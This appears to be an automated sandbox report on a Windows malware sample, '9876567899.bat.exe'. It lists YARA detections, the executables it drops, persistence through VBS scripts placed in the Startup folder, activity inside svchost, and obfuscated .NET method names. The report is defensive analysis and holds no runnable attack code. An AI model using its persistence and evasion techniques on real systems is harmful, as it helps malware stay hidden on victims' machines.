Source:	Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp

Source: 9876567899.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9876567899.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9876567899.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9876567899.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9876567899.bat.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.Dhy2kmz.exe.67c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.3ec4318.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.458c248.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.458c248.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.67c0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.42b31a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Dhy2kmz.exe.3f7cde8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153883300.0000000003E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2169163154.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Dhy2kmz.exe PID: 6552, type: MEMORYSTR

Yara detected aPLib compressed binary

Source: Yara match	File source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007142DE

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00730A76 push ecx; ret	0_2_00730A89
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00050A76 push ecx; ret	2_2_00050A89
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E5668 push es; iretd	4_2_064E5680
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064EC619 push esp; ret	4_2_064EC625
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E2F43 push es; iretd	4_2_064E2F5C
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E1F1A push es; iretd	4_2_064E1F1C
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E7D4E push es; retf	4_2_064E7D54
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064EEDD0 push eax; ret	4_2_064EEDD1
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E85B2 push es; ret	4_2_064E85B4
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0668A62E push es; retf	4_2_0668A634
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0668A6DC push es; ret	4_2_0668A6E8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06682E8A push es; ret	4_2_06682EB8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06686F08 push eax; iretd	4_2_06686F09
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06683B9C pushad ; ret	4_2_06683B9D
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06686901 push edx; retf	4_2_0668690B
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A7252 push eax; ret	4_2_066A7259
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06713E76 push 3AE80390h; retf	4_2_06713E7B
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0671B871 push ss; retf	4_2_0671B874
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0671C066 push ds; ret	4_2_0671C06C
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_067148F3 push es; ret	4_2_067148F4
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06961C16 push es; ret	4_2_06961C18
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06961C41 push es; iretd	4_2_06961C44
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06965D10 push eax; iretd	4_2_06965D1D
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06966D05 push es; iretd	4_2_06966D30
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06966D31 push es; ret	4_2_06966D64
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06967A20 push esp; ret	4_2_06967A21
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0696286F push es; retf	4_2_069628C8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_014D1EC0 push eax; ret	15_2_014D1ED4
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_014D1EC0 push eax; ret	15_2_014D1EFC
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00F21EC0 push eax; ret	18_2_00F21ED4
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00F21EC0 push eax; ret	18_2_00F21EFC

Source: 4.2.Dhy2kmz.exe.62c0000.7.raw.unpack, rgb0nTAMVKQaV4LlFt8.cs

High entropy of concatenated method names: 'hssA7noWMo', 'XGnAy40YRw', 'lSNAJY6Bpt', 'DrjAri4vv1', 'GtEADj9irW', 'oDEA4obrZq', 'dbAAd3PlCS', 'IUsAjFx1QF', 'BIuAlmZeMu', 'BxyAvQjgxm'

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	File created: C:\Users\user\AppData\Roaming\Wnuth.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9876567899.bat.exe	File created: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs			Jump to dropped file

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs			Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0072F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0072F98E
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_007A1C41
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0004F98E
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_000C1C41

Source: C:\Users\user\Desktop\9876567899.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
